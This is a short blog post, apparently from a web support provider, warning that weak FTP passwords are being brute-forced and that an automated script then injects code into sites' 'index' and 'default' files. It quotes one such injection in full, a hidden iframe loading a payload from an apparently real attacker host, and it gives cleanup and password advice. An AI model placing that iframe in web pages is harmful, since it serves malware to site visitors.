Brute Force FTP Password Hacking On The Rise

I know of at least six websites that I provide support for that have had malicious code embedded into their web pages in the last few months.  The common entry point for the hackers in all of these cases has been FTP login.  Each site had simple username/password combinations and hence were fairly easy to get into.   It seems that the hackers are using an  automated script to insert their code as I’ve found that every single file with the filename containing the words “index” or “default” gets modified, regardless of the extension (whether .htm, .html, .php, .asp, etc…) and whether it’s a file that is actually even linked to or not.

Commonly, an invisible iframe like the following gets inserted after the <body> tag or then at the very end of the file.

<iframe src=”http://3e0.ru:8080/index.php” width=160 height=188 style=”visibility: hidden”></iframe>

The file on the remote site then delivers the real payload.  Sometimes javascript code is inserted instead of an iframe.  Again, the javascript code loads an external javascript file which contains the real payload.

If your clients haven’t made recent backups you will need to either manually remove the offending code snippets or then create a script to do it for you (if many files are affected).   If you leave the code in place or don’t remove it quickly enough, the site will end up getting on Googles black list.  Browsers like Firefox will then not show the site and instead put up a big red warning page.  IE will continue to show the hacked pages and is probably the target of the malicious code in the first place.  If your site does get black listed you will need to go request a re-scan from Google.

The easiest way to avoid this hack is just to make sure all your (and your clients) passwords are not overly simple.  The password “password” is not a good choice while  “fuMrHack8” is.